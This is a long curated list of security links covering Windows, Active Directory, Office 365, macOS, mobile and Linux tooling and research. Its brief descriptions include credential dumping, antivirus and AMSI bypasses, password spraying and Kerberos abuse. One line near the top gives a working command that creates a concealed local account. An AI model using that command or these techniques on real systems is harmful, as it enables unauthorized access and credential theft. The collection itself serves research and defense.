SharePoint and Pwn :: Remote Code Execution Against SharePoint Server Abusing DataSet
Secure DevOps Kit for Azure 497 almost 3 years ago (AzSK)
Windows Debugger API — The End of Versioned Structures
DisableAntiSpyware
Have you ever wondered what happens behind the scenes when you type your password into the Windows logon screen and hit enter?
DefendTheFlag 234 over 4 years ago : Get started fast with a built out lab, built from scratch via Azure Resource Manager (ARM) and Desired State Configuration (DSC), to test out Microsoft's security products
DumpReparsePoints 31 over 4 years ago : This is a simple tool to dump all the reparse points on an NTFS volume
Certify SSL Manager : manage free https certificates for IIS
Bypassing Credential Guard : Wdigest can be enabled on a system with Credential Guard by patching the values of g_fParameter_useLogonCredential and g_IsCredGuardEnabled in memory
WSUS Attacks Part 1: Introducing PyWSUS
This is about adding a $ account and having it not show up in net users: net user $ LetMeIn123! /add /active:yes
LECmd 277 5 months ago : Lnk Explorer Command line edition!!
PECmd 223 2 months ago : Prefetch Explorer Command Line
Five PE Analysis Tools Worth Looking At

CSIRT / Operating Systems / Windows / Five PE Analysis Tools Worth Looking At

pestudio : The goal of pestudio is to spot suspicious artifacts within executable files in order to ease and accelerate Malware Initial Assessment and is used by Computer Emergency Response Teams and Labs worldwide
PEview version
FileAlyzer
NTCore Explorer Suite
exeinfo

CSIRT / Operating Systems / Windows

MitigationFlagsCliTool 44 about 4 years ago : Prints mitigation policy information for processes in a dump file
Windows 10 System Programming book samples 408 6 months ago ,
DriverMon 328 about 4 years ago : Monitor activity of any driver
Windows AllTools 1,161 3 months ago : All reasonably stable tools
Sysmon Internals : From File Delete Event to Kernel Code Execution
Windows-driver-samples 6,993 17 days ago : This repo contains driver samples prepared for use with Microsoft Visual Studio and the Windows Driver Kit (WDK). It contains both Universal Windows Driver and desktop-only driver samples
procfilter 397 almost 5 years ago : A YARA-integrated process denial framework for Windows
Winerror 7 about 4 years ago : Get Windows Programming error codes descriptions using the command line
ProcessHacker 11,043 6 days ago : A free, powerful, multi-purpose tool that helps you monitor system resources, debug software and detect malware
PVE CA Cert List Utility : Windows 2003/2008 Certificate Authority Certificate List Utility for pending requests and about-to-expire certificates
Release the Kraken: Fileless injection into Windows Error Reporting service
MinHook 4,406 4 months ago : The Minimalistic x86/x64 API Hooking Library for Windows
Windows security baselines
TokenPlayer 267 almost 4 years ago : Manipulating and Abusing Windows Access Tokens
The Poisoned Postman: Detecting Manipulation of Compliance Features in a Microsoft Exchange Online Environment
ntlmscan 346 5 months ago : scan for NTLM directories
Smbtouch-Scanner 140 over 3 years ago : Automatically scan the inner network to detect whether they are vulnerable
Block process creations originating from PSExec and WMI commands
VDM : Vulnerable Driver Manipulation, a collection of various vulnerable (mostly physical memory exposing) drivers
HppDLL 1 about 4 years ago : Source code for local password dumping using MsvpPasswordValidate hooks
SharpMapExec 653 about 3 years ago : A sharpen version of CrackMapExec. This tool is made to simplify penetration testing of networks and to create a swiss army knife that is made for running on Windows which is often a requirement during insider threat simulation engagements
Fibratus 2,209 7 days ago : A modern tool for the Windows kernel exploration and observability
Ultimate WDAC Bypass List 482 7 months ago : A centralized resource for previously documented WDAC bypass techniques
Live Patching Windows API Calls Using PowerShell
Adventures in Dynamic Evasion
Windows-Insight 150 over 4 years ago : The content of this repository aims to assist efforts on analysing inner working principles, functionalities, and properties of the Microsoft Windows operating system. This repository stores relevant documentation as well as executable files needed for conducting analysis studies
Fully working SMB protocol implementation in webassembly
Parent Process vs. Creator Process
WINDOWS KERNEL ZERO-DAY EXPLOIT (CVE-2021-1732) IS USED BY BITTER APT IN TARGETED ATTACK
ntvdmx64 819 17 days ago : Run Microsoft Windows NTVDM (DOS) on 64bit Editions
Spectre exploits in the "wild"
RegRipper 557 20 days ago
Security rapid modernization plan
Windows & Active Directory Exploitation Cheat Sheet and Command Reference
Finding writable folders and hijackable DLLs
OffensiveCSharp 1,381 almost 2 years ago : Collection of Offensive C# Tooling
Hyper-V internals researches 661 2 months ago : Internals information about Hyper-V
Do You Really Know About LSA Protection (RunAsPPL)? : Dump the memory of a PPL with a userland exploit
MSTSC Packet Dump Utility 27 almost 3 years ago : The mstscdump utility allows unencrypted RDP packets being sent or received by MSTSC.EXE (or any other application that loads MSTSCAX.DLL) to be captured into a PCAP file for later analysis in various tools such as Microsoft Message Analyzer, Microsoft Network Monitor, or WireShark. It also demonstrates how to hook into the ActiveX interfaces exposed by MSTSCAX.DLL
How to bypass Defender in a few easy steps
Running NetworkMiner in Windows Sandbox
Windows Desktop 14 almost 4 years ago : History and analysis of Windows desktop images
A collection of tools to interact with Microsoft Security Response Center API 95 11 months ago
GetTempPathW function
No Longer Just Theory: Black Lotus Labs Uncovers Linux Executables Deployed As Stealth Windows Loaders
Human-operated ransomware : Human-operated ransomware is a large and growing attack trend that represents a threat to organizations in every industry
Sharing the first SimuLand dataset to expedite research and learn about adversary tradecraft
Microsoft Security Best Practices
Awesome Windows Domain Hardening 1,749 almost 5 years ago : A curated list of awesome Security Hardening techniques for Windows
Event Log Explorer™ for Windows event log analysis
Detecting Forged Kerberos Ticket (Golden Ticket & Silver Ticket) Use in Active Directory
EVERYONE GETS A ROOTKIT : Eclypsium Researchers Identify Weakness in Microsoft WPBT Impacting All Windows-based Devices Since Windows 8
Six Facts about Address Space Layout Randomization on Windows
whids 1,152 over 1 year ago : Open Source EDR for Windows
Backdoor .NET assemblies with… dnSpy
Windows-auditing-mindmap 1,044 3 months ago : Set of Mindmaps providing a detailed overview of the different #Windows auditing capacities and event log files
If you ever see RDP events, you should parse out the RDP bitmap cache. It maps out bitmap images of a user's RDP session.
Here are a few tool resources for using WinRM w/o PowerShell

winrs
Scripting in Windows Remote Management
CSharpWinRM 161 about 4 years ago : .NET 4.0 WinRM API Command Execution
WinRMDLL 140 about 3 years ago : C++ WinRM API via Reflective DLL
WSMan-WinRM 222 over 4 years ago : A collection of proof-of-concept source code and scripts for executing remote commands over WinRM using the WSMan.Automation COM object
pywinrm : a Python client for the Windows Remote Management (WinRM) service. It allows you to invoke commands on target Windows machines from any machine that can run Python
Abusing Windows Remote Management (WinRM) with Metasploit

LACheck 83 about 3 years ago : Multithreaded C# .NET Assembly Local Administrative Privilege Enumeration
awesome_windows_logical_bugs 567 5 months ago : collect for learning cases
Attacking RDP from Inside : How we abused named pipes for smart-card hijacking, unauthorized file system access to client machines and more
Dynamic Invocation in .NET to bypass hooks
LowBox Token Permissive Learning Mode
DInjector : Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL
SMB-Session-Spoofing 118 about 1 year ago : The goal of this program is to create a fake SMB Session
Windows Kernel Introspection (WKI)
MSSQL Analysis Services - Coerced Authentication 124 about 1 year ago : A technique to coerce a Windows SQL Server to authenticate on an arbitrary machine
Reinschauer 506 almost 2 years ago : A PoC to remotely control Windows machines over Websockets
Lsass Shtinkering 377 almost 2 years ago : New method of dumping LSASS by abusing the Windows Error Reporting service. It sends a message to the service with the ALPC protocol to report an exception on LSASS. This report will cause the service to dump the memory of LSASS
Windows Persistence Techniques
Windows XP / Windows Server 2003 VLK key generator 878 12 months ago
Banshee 493 8 months ago : Experimental Windows x64 Kernel Driver/Rootkit
New Variant of DLL Search Order Hijacking Bypasses Windows 10 and 11 Protections
Active Directory Control Paths 654 almost 4 years ago
Gaining Domain Admin from Outside Active Directory, using (LLMNR/NBT-NS/mDNS Poisoner and NTLMv1/2 Relay)
Invoke-ADLabDeployer 479 almost 6 years ago : Automated deployment of Windows and Active Directory test lab networks. Useful for red and blue teams
PowerShellClassLab 41 over 6 years ago : This is a set of Azure Resource Manager Templates that generates an Active Directory lab consisting of a Domain Controller, two Windows servers and a Linux server
ADImporter 69 over 6 years ago
Low Privilege Active Directory Enumeration from a non-Domain Joined Host
Active Directory as a C2
Escalating privileges with ACLs in Active Directory
Active Directory Kill Chain Attack & Defense 4,421 15 days ago : This document was designed to be a useful, informational asset for those looking to understand the specific tactics, techniques, and procedures (TTPs) attackers are leveraging to compromise Active Directory, with guidance on mitigation, detection, and prevention, and to understand the Active Directory kill chain and modern post-exploitation adversary tradecraft
#TR19 Active Directory Security Track
Penetration Testing Active Directory, Part I : I’ve had several customers come to me before a pentest and say they think they’re in good shape because their vulnerability scan shows no critical vulnerabilities and that they’re ready for a pentest, which then leads me to getting domain administrator in fifteen minutes by just exploiting misconfigurations in AD
Penetration Testing Active Directory, Part II : For most of this part of the series, I will use the rsmith user credentials, as they are low-level, forcing us to do privilege escalation
Wagging the Dog : Abusing Resource-Based Constrained Delegation to Attack Active Directory
Exploiting PrivExchange : The PrivExchange tool simply logs in on Exchange Web Services to subscribe to push notifications to a specific host

BloodHound:

BloodHound 9,893 5 months ago : Six Degrees of Domain Admin, and a based ingestor for BloodHound
BloodHound Database Creator 377 5 months ago : This python script will generate a randomized data set for testing BloodHound features and analysis
Case Study: Password Analysis with BloodHound
Introducing BloodHound 4.0: The Azure Update
SharpHound3 520 over 2 years ago
ATTACK MAPPING WITH BLOODHOUND
aclpwn.py 702 about 3 years ago : Active Directory ACL exploitation with BloodHound
BloodHound.py 1,940 4 months ago : A Python based ingestor for BloodHound
BloodHound-Tools 440 about 2 years ago : Collection of tools that reflect the network dimension into Bloodhound's data

Kerberos basics & (ab)use of Certificates within Active Directory (i.e. AD CS and PKINIT) :

Pass the Certificate
UnPAC the hash
Shadow Credentials
Certificate Services (AD-CS)
Certificate templates
CA configuration
Access controls
Web endpoints

Kerberos:

Using Kerberos for Authentication Relay Attacks
Kerberos Resource-Based Constrained Delegation : When an Image Change Leads to a Privilege Escalation
New-KrbtgtKeys.ps1 406 9 months ago : This script will enable you to reset the krbtgt account password and related keys while minimizing the likelihood of Kerberos authentication issues being caused by the operation
Kerberos cheatsheet : A cheatsheet with commands that can be used to perform kerberos attacks

Bypassing AD account lockout for a compromised account
Azure AD and ADFS best practices : Defending against password spray attacks
NetNTLMtoSilverTicket 763 over 3 years ago : SpoolSample -> Responder w/NetNTLM Downgrade -> NetNTLMv1 -> NTLM -> Kerberos Silver Ticket
Domain Goodness – How I Learned to LOVE AD Explorer
windapsearch 799 over 2 years ago : Python script to enumerate users, groups and computers from a Windows domain through LDAP queries
LDAP Ping and Determining Your Machine’s Site
Non-Admin NTLM Relaying & ETERNALBLUE Exploitation
Active Directory administrative tier model
Exchange-AD-Privesc 728 over 1 year ago : Exchange privilege escalations to Active Directory
Hunting for reconnaissance activities using LDAP search filters
Faking an AD account password change is possible , but detectable.
Building Free Active Directory Lab in Azure Ethical Hacking Lessons
Configure the log analytics wizard
Reset the krbtgt account password/keys
GetNPUsers & Kerberos Pre-Auth Explained
WinPwn 3,336 10 months ago : Automation for internal Windows Penetrationtest / AD-Security
BadBlood 2,047 over 1 year ago : by @davidprowe, Secframe.com, fills a Microsoft Active Directory Domain with a structure and thousands of objects. The output of the tool is a domain similar to a domain in the real world. After BadBlood is run on a domain, security analysts and engineers can practice using tools to gain an understanding and prescribe to securing Active…
Vulnerable-AD 2,010 7 months ago : Create a vulnerable Active Directory that allows you to test most of the Active Directory attacks in a local lab
EXTRACTING PASSWORD HASHES FROM THE NTDS.DIT FILE
Active-Directory-Exploitation-Cheat-Sheet 5,669 about 2 months ago : A cheat sheet that contains common enumeration and attack methods for Windows Active Directory
Active Directory Lab Setup Tool : Active Directory Lab for Penetration Testing
Rubeus 4,135 2 months ago : a C# toolset for raw Kerberos interaction and abuses
Enabling Active Directory DNS query logging
Detecting CVE-2020-1472 (CISA ED 20-04) Using Splunk Attack Range
ADTimeline 475 7 days ago : Timeline of Active Directory changes with replication metadata
Still Passing the Hash 15 Years Later
Azure-Sentinel 4,607 7 days ago : Cloud-native SIEM for intelligent security analytics for your entire enterprise
Detecting Abuse of Authentication Mechanisms
Detecting the Elusive: Active Directory Threat Hunting
Exporting AD FS certificates revisited: Tactics, Techniques and Procedures
GPO Abuse: “You can’t see me”
SERVER (UN)TRUST ACCOUNT : Active Directory persistence through userAccountControl manipulation
Active Directory Certificate Services (ADCS - PKI) domain admin vulnerability
DSInternals 1,654 about 2 months ago : Directory Services Internals (DSInternals) PowerShell Module and Framework
Certipy 2,418 3 months ago is a Python tool to enumerate and abuse misconfigurations in Active Directory Certificate Services (AD CS)
Cobalt strike MANUALS_V2 94 about 1 month ago : Increasing privileges and collecting information
Active Directory (Attack & Defense )
Your Azure AD Connect server ... it's a Tier 0 asset
Shooting Up: On-Prem to Cloud — Detecting “AADConnect” Creds Dump
AADInternals 1,302 9 days ago : PowerShell module for administering Azure AD and Office 365
From Zero to Domain Admin
Attacking Active Directory: 0 to 0.9
Offensive WMI - Active Directory Enumeration Part , , and
BloodyAD 1,238 18 days ago : an Active Directory Privilege Escalation Framework
SID filter as security boundary between domains? (Part 7) - Trust account attack - from trusting to trusted
KrbRelayUp 1,529 over 2 years ago : a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings)
Harvesting Active Directory credentials via HTTP Request Smuggling
Ping Castle Cloud 145 over 1 year ago : Audit program for AzureAD
Protection of privileged users and groups by Azure AD Restricted Management Administrative Units
A little tool to play with Windows security 19,466 5 months ago
Preventing Mimikatz Attacks – Blue Team – Medium
pypykatz 2,879 about 1 month ago : Mimikatz implementation in pure Python
Walk-through Mimikatz sekurlsa module
Mimikatz: Mitigating credential theft attacks (pt-br)
PERFORMING PASS-THE-HASH ATTACKS WITH MIMIKATZ
SharpKatz 974 about 3 years ago : Porting of mimikatz sekurlsa::logonpasswords, sekurlsa::ekeys and lsadump::dcsync commands
Protecting RDP Passwords from Mimikatz Using Remote Credential Guard
Updating Mimikatz in Metasploit
Capturing Credentials with mimikatz
Dumping User Passwords from Windows Memory with Mimikatz
HandleKatz 573 about 2 years ago : PIC lsass dumper using cloned handles
CredentialDumping without Mimikatz
Dumping Lsass Without Mimikatz
PowerShell Gallery
PowerShell Scripts 443 almost 7 years ago : Collection of PowerShell scripts
Example of Malicious DLL Injected in PowerShell
POWERSHELL LOGGING: OBFUSCATION AND SOME NEW(ISH) BYPASSES PART 1
Empire 4,258 10 days ago : Empire is a PowerShell and Python 3.x post-exploitation framework
Invisi-Shell 1,105 over 5 years ago : Hide your Powershell script in plain sight. Bypass all Powershell security features
DevSec Defense How DevOps Practices Can Drive Detection Development For Defenders
Chimera 1,424 about 3 years ago : a (shiny and very hack-ish) PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions
Geeking out with UEFI, again
PrivescCheck 2,976 11 days ago : Privilege Escalation Enumeration Script for Windows
Stracciatella 503 about 2 years ago : OpSec-safe Powershell runspace from within C# (aka SharpPick) with AMSI, Constrained Language Mode and Script Block Logging disabled at startup
Invoke-PSImage 2,162 about 5 years ago : Embeds a PowerShell script in the pixels of a PNG file and generates a oneliner to execute
Invoke-TheHash 1,480 almost 6 years ago : PowerShell Pass The Hash Utils
DeepBlueCLI 2,188 about 1 year ago : a PowerShell Module for Threat Hunting via Windows Event Logs
PowerShell Security: PowerShell Attack Tools, Mitigation, & Detection
CheeseTools 691 over 3 years ago : Self-developed tools for Lateral Movement/Code Execution
Random 260 3 months ago : a lot of powershell scripts
CredPhish 285 over 3 years ago : a PowerShell script designed to invoke legitimate credential prompts and exfiltrate passwords over DNS
PowerShell Obfuscation
powercat 2,147 9 months ago : netshell features all in version 2 powershell
PSByPassCLM 375 almost 3 years ago : Bypass for PowerShell Constrained Language Mode
Basic PowerShell for Pentesters
Invoke-CradleCrafter 822 over 6 years ago : PowerShell Remote Download Cradle Generator & Obfuscator
LDAP Monitor 839 5 months ago : Monitor creation, deletion and changes to LDAP objects live during your pentest or system administration!
Understanding and Bypassing AMSI
Exploring PowerShell AMSI and Logging Evasion
AMSI.fail : generates obfuscated PowerShell snippets that break or disable AMSI for the current process
INTRODUCTION TO SANDBOX EVASION AND AMSI BYPASSES
PSBits 3,207 9 days ago : Simple (relatively) things allowing you to dig a bit deeper than usual
Evading Detection: A Beginner's Guide to Obfuscation 1,010 6 months ago
comsvcs MiniDump examples
Beginning PowerShell Empire - Packet Analysis
Detailed properties in the Office 365 audit log
Office 365 Mail Forwarding Rules (and other Mail Rules too)
Application Guard for Office (public preview) for admins 957 4 days ago
o365spray 765 16 days ago : Username enumeration and password spraying tool aimed at Microsoft O365
AdminSubmissionsAPI scripts for URL and mail submission 10 over 3 years ago : Admin Submission API allows submission of URLs, mail messages, file mail messages and files to Microsoft to re-scan and get the newest verdict on the submitted entity. Admin Submissions API is available both to Exchange Online Protection customers as well as to Office 365 ATP customers
Commentator 49 about 7 years ago : Commentator is a tool written in PowerShell to add a comment to the file properties of a Microsoft Office document (xlsx/m, docx/m, or pptx/m)
Exploiting MFA Inconsistencies on Microsoft Services : A tool for checking if MFA is enabled on multiple Microsoft Services
msoffcrypto-tool 556 4 months ago : Python tool and library for decrypting MS Office files with passwords or other keys
pyxlsb2 19 over 2 years ago : an Excel 2007+ Binary Workbook (xlsb) parser for Python
Making Clouds Rain :: Remote Code Execution in Microsoft Office 365
The worst of the two worlds: Excel meets Outlook
Go365 621 8 months ago : An Office365 User Attack Tool
Microsoft-365-Defender-Hunting-Queries 1,937 almost 3 years ago : Sample queries for Advanced hunting in Microsoft 365 Defender
m365_groups_enum 52 over 3 years ago : Enumerate Microsoft 365 Groups in a tenant with their metadata
How to hunt for LDAP reconnaissance within M365 Defender?
Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs
Reproducing The ProxyShell Pwn2Own Exploit
ProxyLogon is Just the Tip of the Iceberg : A Surface on Microsoft Exchange Server!
PROXYTOKEN: AN AUTHENTICATION BYPASS IN MICROSOFT EXCHANGE SERVER
How Default Permissions on Microsoft Power Apps Exposed Millions
Excel Recipe: Some VBA Code with a Touch of Excel4 Macro
An XML-Obfuscated Office Document (CVE-2021-40444)
Simple Analysis Of A CVE-2021-40444 .docx Document
cli-microsoft365 926 6 days ago : Manage Microsoft 365 and SharePoint Framework projects on any platform
There are multiple threat actors using OneDrive in campaigns, straight up just linking OneDrive.
All Your (d)Base Are Belong To Us, Part 2: Code Execution in Microsoft Office (CVE-2021–38646)
MSSpray 149 almost 2 years ago : used to conduct password spray attacks against Azure AD as well as validate the implementation of MFA on Azure and Office 365 endpoints
Comparison of MOTW (Mark of the Web) propagation support of archiver software for Windows 169 3 months ago
SnaffPoint 239 about 2 years ago : A tool for pentesters to find candies in SharePoint

macOS/iOS

Apple Open Source : security mirror
An iOS App In Assembly 559 over 6 years ago
Having fun with macOS 1days 121 over 6 years ago
x18-leak 83 over 6 years ago : iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation
EmPyre 867 about 7 years ago : A post-exploitation OS X/Linux agent written in Python 2.7
Apple Lightning (cont.) - serial number reading : Kanzi is a cable used by Apple's own engineers to debug various hardware (mainly iOS devices, of course) with SWD (Serial Wire Debug - JTAG for ARM cores). Set of tools to interact with various aspects of the Kanzi probe and its derivatives
SDQAnalyzer 200 12 months ago : a Saleae analyzer plugin for the SDQ (Apple Lightning, MagSafe, Battery) protocol
Inside Code Signing
jelbrekTime 223 about 6 years ago : A developer jailbreak for Apple Watch S3 watchOS 4.1
Disabling MacOS SIP via a VirtualBox kext Vulnerability
mOSL 225 almost 4 years ago : Bash script to audit and fix macOS High Sierra (10.13.x) security settings

Objective-See:

DoNotDisturb 294 almost 4 years ago : Detect Evil Maid Attacks
sniffMK 215 almost 4 years ago : sniff mouse and keyboard events
Remote Mac Exploitation Via Custom URL Schemes
The Mac Malware of 2018

KisMac2 901 about 6 years ago : KisMAC is a free, open source wireless stumbling and security tool for Mac OS X
osx-security-awesome 734 11 months ago : A collection of OSX and iOS security resources
threadexec 80 over 6 years ago : A library to execute code in the context of other processes on iOS 11
Knowledge is Power! Using the macOS/iOS knowledgeC.db Database to Determine Precise User and Application Usage
iOS12 Kernelcache Laundering
kernelcache-laundering 60 about 6 years ago : load iOS12 kernelcaches and PAC code in IDA
Armor 279 about 1 year ago : a simple Bash script designed to create encrypted macOS payloads capable of evading antivirus scanners
inject_trusts-iOS-v12.1.2-16C104-iPhone11,x.c
opendrop 8,709 5 months ago : An open Apple AirDrop implementation written in Python
A sample of the iOS malware sha256:0d2ee9ade24163613772fdda201af985d852ab506e3d3e7f07fb3fa8b0853560
ipwndfu 7,094 9 months ago : open-source jailbreaking tool for older iOS devices
Pair Locking your iPhone with Configurator 2
KTRW : The journey to build a debuggable iPhone
Privilege Escalation | macOS Malware & The Path to Root Part 2
Random scripts for use in the Jamf Pro
Dylib Hijacking MacOS Red Teaming 211:
iOS Application Injection : Having been interested in jailbreaking iOS devices for going on almost a decade, mixing security and this makes sense. Within this entry, I document my method of checking if an application can have code injected
The Mac Malware of 2019 👾 : a comprehensive analysis of the year's new malware
OSX.EvilQuest Uncovered
Low-Level Process Hunting on macOS
CVE-2020–9934: Bypassing TCC ...for unauthorized access to sensitive user data!
Attack Secure Boot of SEP windknown@pangu
Compromising the macOS Kernel through Safari by Chaining Six Vulnerabilities 402 over 3 years ago
Sinter : New user-mode security enforcement for macOS
Who put that in my Full Disk Access list? ssh and Mojave’s privacy protection
macOS-Fortress 422 almost 3 years ago : Firewall and Privatizing Proxy for Trackers, Attackers, Malware, Adware, and Spammers with Anti-Virus On-Demand and On-Access Scanning (PF, squid, privoxy, hphosts, dshield, emergingthreats, hostsfile, PAC file, clamav)
From zero to tfp0 - Part 1: Prologue
From zero to tfp0 - Part 2: A Walkthrough of the voucher_swap exploit
We Hacked Apple for 3 Months: Here’s What We Found
MACOS INJECTION VIA THIRD-PARTY FRAMEWORKS
NetworkSniffer 122 over 1 year ago : Log iOS network traffic without a proxy
IPv6 security
OpenHaystack 8,572 5 months ago : Build your own 'AirTags' label today! Framework for tracking personal Bluetooth devices via Apple's massive Find My network
All Your Macs Are Belong To Us : bypassing macOS's file quarantine, gatekeeper, and notarization requirements
macOS Security Compliance Project
Introducing : macOS Initial Access Payload Generator
Mythic-Macro-Generator 44 over 3 years ago
macOSTools 261 about 1 year ago : macOS Offensive Tools
TrueTree 245 3 months ago : A command line tool for pstree-like output on macOS with additional pid capturing capabilities
Zero-Day TCC bypass discovered in XCSSET malware
Dissecting the Apple M1 GPU, part I
macos_shell_memory 79 over 3 years ago : Execute MachO binaries in memory using CGo
pwn-my 647 about 3 years ago : iOS 14.5 WebKit/Safari based Jailbreak
M1RACLES : M1ssing Register Access Controls Leak EL0 State. CVE-2021-30747 is a covert channel vulnerability in the Apple Silicon “M1” chip
Vulnerability Spotlight: A deep dive into macOS SMB server
How to Use Kerberos on macOS
Bypassing macOS TCC User Privacy Protections By Accident and Design
Anecdotes About the macOS Sandbox File Limit
SSD Advisory – macOS Finder RCE : Find out how a vulnerability in macOS Finder system allows remote attackers to trick users into running arbitrary commands
How malware gets into the App Store and why Apple can't stop that
Quick Analysis for the SSID Format String Bug
De Rebus Antiquis : This article aims to explain how to exploit the recursive stack overflow bug in the iOS 7 bootchain
AirTag Scripts & Resources 150 5 months ago : AirTag instrumentation including AirTechno and firmware downgrades
Pegasus ID : After extensive research and understanding of how Pegasus Spyware is operating inside of iOS and AndroidOS systems I have created tools that will be able to identify & validate the presence of the spyware on your mobile devices, and tablets. Initial detection points were derived from the mvt-project
UTM : Securely run operating systems on your Mac
qemu-t8030 1,998 about 2 years ago : iPhone 11 emulated on QEMU
Dissecting TriangleDB, a Triangulation spyware implant
kfd 874 10 months ago : short for kernel file descriptor, a project to read and write kernel memory on Apple devices

Mobile

Today I make public ALL recordings and updated slides (+ FAQ) for my mobile security class, MOBISEC 2020!

Android

android-security-awesome 8,213 3 months ago : A collection of android security related resources
tip toeing past android 7’s network security configuration
A Story About Three Bluetooth Vulnerabilities in Android
Creating an Android Open Source Research Device on Your PC
Droidefense 473 almost 2 years ago : Advance Android Malware Analysis Framework
android-device-check 83 about 5 years ago : Check Android device security settings
Project Zero : OATmeal on the Universal Cereal Bus: Exploiting Android phones over USB
I'm looking at a Huawei P20 from China, let's see what I can find
Tracking down the developer of Android adware affecting millions of users
CLI tool to analyze APKs 41 8 months ago
Breaking Samsung's Root of Trust: Exploiting Samsung S10 S-Boot
TiYunZong-An-Exploit-Chain-to-Remotely-Root-Modern-Android-Devices 166 over 4 years ago
Exploiting Android Messengers with WebRTC: Part 3
setools-android 249 about 7 years ago : Unofficial port of setools to Android with additional sepolicy-inject utility included
Security Guidelines : OpenHarmony is an open OS that allows you to easily develop services and applications. It provides an execution environment to ensure security of application data and user data
Proxying Android app traffic – Common issues / checklist
Magisk 48,721 12 days ago : a suite of open source software for customizing Android, supporting devices higher than Android 5.0
Magisk Trust User Certs 1,770 about 1 year ago : A Magisk module that automatically adds user certificates to the system root CA store
MagiskFrida 949 8 days ago : Run frida-server on boot with Magisk, always up-to-date
Android-PIN-Bruteforce 4,055 about 1 year ago : Unlock an Android phone (or device) by bruteforcing the lockscreen PIN. Turn your Kali Nethunter phone into a bruteforce PIN cracker for Android devices! (no root, no adb)
Mobile Threat Catalogue 143 about 1 year ago : NIST/NCCoE Mobile Threat Catalogue
CiLocks 2,313 8 months ago : Crack Interface lockscreen, Metasploit and More Android/IOS Hacking
mvt 10,416 21 days ago : MVT is a forensic tool to look for signs of infection in smartphone devices
Oscorp evolves into UBEL: an advanced Android malware spreading across the globe
Android Application Penetration Testing Checklist
50 secrets codes on Android
MobSecco 77 over 1 year ago : Cloning apk for bypassing code tampering detection, Google Safety Net and scanning vulnerable plugins

Linux / *Nix

BCC 20,577 8 days ago : Tools for BPF-based Linux IO analysis, networking, monitoring, and more
OpenSnitch is a GNU/Linux port of the Little Snitch application firewall 10,932 15 days ago
Security Onion 3,074 over 3 years ago : Linux distro for IDS, NSM, and Log Management
Linux Kernel Defence Map 1,774 5 months ago
wcc 1,849 about 1 month ago : The Witchcraft Compiler Collection
Ground Zero: Reverse Engineering :

Password Protected Reverse Shells – Linux x64 Part 1-2:

Active Directory Dojo:

Active Directory Penetration Dojo - Setup of AD Penetration Lab : Part 1 - ScriptDotSh
Active Directory Penetration Dojo - Setup of AD Penetration Lab : Part 2 - ScriptDotSh
Active Directory Penetration Dojo - Creation of Forest Trust : Part 3 - ScriptDotSh
Active Directory Penetration Dojo – AD Environment Enumeration -1 - ScriptDotSh

Dmesg under the hood : Dmesg allows us to grasp what's going on under the hood when the kernel gets bad. Check out how dmesg is able to read kernel logs and show them to the user
Randomize your MAC address using NetworkManager
Shadow-Box 184 over 5 years ago : Lightweight and Practical Kernel Protector for x86 (Presented at BlackHat Asia 2017/2018, beVX 2018 and HITBSecConf 2017)
Privilege Escalation : pentestbook
A cache invalidation bug in Linux memory management Project Zero:
Announcing flickerfree boot for Fedora 29
The Linux Backdoor Attempt of 2003
Binary analysis on Linux (PT-BR)
GMER : Rootkit Detector and Remover
suprotect 46 about 6 years ago : Changing memory protection in an arbitrary process
A look at home routers, and a surprising bug in Linux/MIPS
Hacking Tricks (pt-br) : Privilege escalation on Linux with capabilities
Basic Linux Privilege Escalation : It's just a basic & rough guide
Linux process infection (part I) : Among the different tasks that a Red Team should carry out, there is one that is remarkable by its intrinsic craftsmanship: putting an APT inside a computer system and ensuring its persistence
tpotce 6,855 8 days ago : T-Pot Universal Installer and ISO Creator
Linux Privilege Escalation via LXD & Hijacked UNIX Socket Credentials : LXD is a management API for dealing with LXC containers on Linux systems. It will perform tasks for any members of the local lxd group. It does not make an effort to match the permissions of the calling user to the function it is asked to perform
Linuxprivchecker.py 1,569 almost 3 years ago : A Linux Privilege Escalation Check Script
Linux Kernel exploitation Tutorial. 262 over 4 years ago
ebpf_exporter 2,200 20 days ago : Prometheus exporter for custom eBPF metrics
Zydra 421 12 months ago : is a file password recovery tool and Linux shadow file cracker. It uses dictionary search or the brute-force method for cracking passwords
A gentle introduction to Linux Kernel fuzzing -
Teardown of a Failed Linux LTS Spectre Fix : Today's blog will serve as a deep dive into a recent Spectre fix, one of dozens being manually applied to the upstream Linux kernel. We'll cover the full path this fix took, from its warning-inducing initial state to its correction upstream and then later brokenness when backported to all of the upstream Long Term Support (LTS) kernels
Ropstar 317 over 1 year ago : Automatic exploit generation for simple linux pwn challenges
Ken Thompson's Unix password
Exploiting Wi-Fi Stack on Tesla Model S
dlinject.py 775 over 2 years ago : Inject a shared library (i.e. arbitrary code) into a live linux process, without ptrace
(Ab)using Kerberos from Linux
LKRG 415 about 1 month ago : Linux Kernel Runtime Guard
Privilege Escalation via Python Library Hijacking
Logging Passwords on Linux
Kicksecure ™ : A Security-hardened, Non-anonymous Linux Distribution
Setuid Demystified
ProcDump-for-Linux 2,951 6 days ago : A Linux version of the ProcDump Sysinternals tool
OPNsense GUI, API and systems backend 3,363 4 days ago
static-binaries 3,183 over 1 year ago : Various *nix tools built as statically-linked binaries
Traitor 6,689 8 months ago : Automatic Linux privesc via exploitation of low-hanging fruit e.g. gtfobins ⬆️ ☠️
ProcMon-for-Linux 4,030 7 days ago : is a Linux reimagining of the classic Procmon tool from the Sysinternals suite of tools for Windows. Procmon provides a convenient and efficient way for Linux developers to trace the syscall activity on the system
OSWatcher 58 about 1 year ago : A framework to track the evolution of Operating Systems over time
Producing a trustworthy x86-based Linux appliance
Running a quick NMAP scan to inventory my network
Packet Strider 253 almost 4 years ago : A network packet forensics tool for SSH
telfhash 102 almost 3 years ago (Trend Micro ELF Hash): Symbol hash for ELF files
64-bit Linux stack smashing tutorial: Part 1
Hardening ELF binaries using Relocation Read-Only (RELRO)
Linux Threat Report 2021 1H
Learning Linux Kernel Exploitation - Part 1
Microsoft finds new elevation of privilege Linux vulnerability, Nimbuspwn
So You Wanna Pwn The Kernel?
SMB “Access is denied” caused by anti-NTLM relay protection

CSIRT / Mobile / Cloud

Scout Suite 6,730 about 2 months ago : Multi-Cloud Security Auditing Tool
Cloud Security Research 355 over 4 years ago : Cloud-related research releases from the Rhino Security Labs team
